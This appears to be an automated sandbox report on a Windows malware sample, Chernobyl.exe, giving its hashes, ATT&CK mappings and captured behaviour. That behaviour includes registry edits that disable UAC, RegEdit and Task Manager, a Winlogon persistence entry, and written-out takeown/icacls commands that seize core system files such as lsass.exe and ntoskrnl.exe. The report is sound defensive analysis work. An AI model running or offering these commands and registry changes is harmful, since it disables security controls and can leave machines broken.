Analysis
-
max time kernel
39s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
02-03-2024 19:39
Static task
static1
Behavioral task
behavioral1
Sample
Chernobyl.exe
Resource
win7-20240221-en
General
-
Target
Chernobyl.exe
-
Size
338KB
-
MD5
0f6ef368d9dfdf12dcf44f727fbd4d5c
-
SHA1
5bbf583c7d0f74255c13b7bbdb5d5609d80393e9
-
SHA256
30acb23863a1043c7210c8fb75236fce5111bef305c6574e518e9d0e50d740cf
-
SHA512
16e211d19604b49c4b6837f580ec2c83cb27868f481d3ee33394716110e32ac363165bed5e9445c3807753cac793e5a044c3986d10ab04cfbd832c68438f546c
-
SSDEEP
6144:Ubeo02222222222222222222222222222222222222222222222222222222222w:QkHOZzv4TatsNqaJA
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" Chernobyl.exe -
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Chernobyl.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 14 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exepid process 872 takeown.exe 2656 takeown.exe 2460 takeown.exe 1700 takeown.exe 2960 takeown.exe 1772 icacls.exe 1760 takeown.exe 3064 takeown.exe 3040 takeown.exe 2468 takeown.exe 2920 icacls.exe 2564 takeown.exe 2552 takeown.exe 2512 icacls.exe -
Modifies file permissions 1 TTPs 14 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exepid process 872 takeown.exe 2656 takeown.exe 2552 takeown.exe 2468 takeown.exe 2512 icacls.exe 2960 takeown.exe 1760 takeown.exe 2920 icacls.exe 1700 takeown.exe 3064 takeown.exe 1772 icacls.exe 2564 takeown.exe 3040 takeown.exe 2460 takeown.exe -
Processes:
Chernobyl.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" Chernobyl.exe -
Drops file in System32 directory 1 IoCs
Processes:
Chernobyl.exedescription ioc process File opened for modification C:\Windows\SysWOW64\kill.ico Chernobyl.exe -
Drops file in Windows directory 2 IoCs
Processes:
Chernobyl.exedescription ioc process File opened for modification C:\Windows\cluttscape.exe Chernobyl.exe File created C:\Windows\cluttscape.exe Chernobyl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\ = "C:\\Windows\\SysWow64\\kill.ico" Chernobyl.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
Chernobyl.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 2104 Chernobyl.exe Token: SeDebugPrivilege 2104 Chernobyl.exe Token: SeTakeOwnershipPrivilege 1760 takeown.exe Token: SeTakeOwnershipPrivilege 1700 takeown.exe Token: SeTakeOwnershipPrivilege 872 takeown.exe Token: SeTakeOwnershipPrivilege 3064 takeown.exe Token: SeTakeOwnershipPrivilege 2656 takeown.exe Token: SeTakeOwnershipPrivilege 2564 takeown.exe Token: SeTakeOwnershipPrivilege 3040 takeown.exe Token: SeTakeOwnershipPrivilege 2460 takeown.exe Token: SeTakeOwnershipPrivilege 2552 takeown.exe Token: SeTakeOwnershipPrivilege 2468 takeown.exe Token: SeTakeOwnershipPrivilege 2960 takeown.exe Token: SeShutdownPrivilege 2104 Chernobyl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Chernobyl.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2104 wrote to memory of 320 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 320 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 320 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 320 2104 Chernobyl.exe cmd.exe PID 320 wrote to memory of 1456 320 cmd.exe rundll32.exe PID 320 wrote to memory of 1456 320 cmd.exe rundll32.exe PID 320 wrote to memory of 1456 320 cmd.exe rundll32.exe PID 320 wrote to memory of 1456 320 cmd.exe rundll32.exe PID 320 wrote to memory of 1456 320 cmd.exe rundll32.exe PID 320 wrote to memory of 1456 320 cmd.exe rundll32.exe PID 320 wrote to memory of 1456 320 cmd.exe rundll32.exe PID 2104 wrote to memory of 1508 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 1508 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 1508 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 1508 2104 Chernobyl.exe cmd.exe PID 1508 wrote to memory of 1760 1508 cmd.exe takeown.exe PID 1508 wrote to memory of 1760 1508 cmd.exe takeown.exe PID 1508 wrote to memory of 1760 1508 cmd.exe takeown.exe PID 1508 wrote to memory of 1760 1508 cmd.exe takeown.exe PID 2104 wrote to memory of 1692 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 1692 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 1692 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 1692 2104 Chernobyl.exe cmd.exe PID 1692 wrote to memory of 1700 1692 cmd.exe takeown.exe PID 1692 wrote to memory of 1700 1692 cmd.exe takeown.exe PID 1692 wrote to memory of 1700 1692 cmd.exe takeown.exe PID 1692 wrote to memory of 1700 1692 cmd.exe takeown.exe PID 2104 wrote to memory of 2252 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 2252 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 2252 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 2252 2104 Chernobyl.exe cmd.exe PID 2252 wrote to memory of 872 2252 cmd.exe takeown.exe PID 2252 wrote to memory of 872 2252 cmd.exe takeown.exe PID 2252 wrote to memory of 872 2252 cmd.exe takeown.exe PID 2252 wrote to memory of 872 2252 cmd.exe takeown.exe PID 2252 wrote to memory of 2920 2252 cmd.exe icacls.exe PID 2252 wrote to memory of 2920 2252 cmd.exe icacls.exe PID 2252 wrote to memory of 2920 2252 cmd.exe icacls.exe PID 2252 wrote to memory of 2920 2252 cmd.exe icacls.exe PID 2104 wrote to memory of 2528 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 2528 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 2528 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 2528 2104 Chernobyl.exe cmd.exe PID 2528 wrote to memory of 3064 2528 cmd.exe takeown.exe PID 2528 wrote to memory of 3064 2528 cmd.exe takeown.exe PID 2528 wrote to memory of 3064 2528 cmd.exe takeown.exe PID 2528 wrote to memory of 3064 2528 cmd.exe takeown.exe PID 2104 wrote to memory of 2544 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 2544 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 2544 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 2544 2104 Chernobyl.exe cmd.exe PID 2544 wrote to memory of 2656 2544 cmd.exe takeown.exe PID 2544 wrote to memory of 2656 2544 cmd.exe takeown.exe PID 2544 wrote to memory of 2656 2544 cmd.exe takeown.exe PID 2544 wrote to memory of 2656 2544 cmd.exe takeown.exe PID 2104 wrote to memory of 2712 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 2712 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 2712 2104 Chernobyl.exe cmd.exe PID 2104 wrote to memory of 2712 2104 Chernobyl.exe cmd.exe PID 2712 wrote to memory of 2564 2712 cmd.exe takeown.exe PID 2712 wrote to memory of 2564 2712 cmd.exe takeown.exe PID 2712 wrote to memory of 2564 2712 cmd.exe takeown.exe PID 2712 wrote to memory of 2564 2712 cmd.exe takeown.exe PID 2104 wrote to memory of 2684 2104 Chernobyl.exe cmd.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Checks whether UAC is enabled
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2104 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1456
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\smss.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\csrss.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\wininit.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\wininit.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\lsass.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\services.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit2⤵PID:2684
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\winlogon.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit2⤵PID:2688
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\winload.efi3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit2⤵PID:2660
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\winload.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:2436
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\ntoskrnl.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2512
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit2⤵PID:2952
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\svchost.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\svchost.exe /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1772
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Winlogon Helper DLL
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\—↕óÂ∩ïé☺¤Σ≈Ç—Σ▼■¼ñ¢▼■²█ó╠╔▌ž5£♣☼↕řσ▲¶▼Σ²9®Âπ◘šŸßä≈♫íí╬♫◙▼☼í¾╧♂¾◙¢≈¾å™◙╚╔≈¬¢®ïπ☻♪æ♥πœŸ▌åÇ◘₧—↕≈ž86☺¥éč
Filesize666B
MD59e1e5883c74742a497cf5c272ccd2321
SHA12cf33e34d08b8e17743a60352baffef4b6f02dee
SHA256ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
SHA512f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b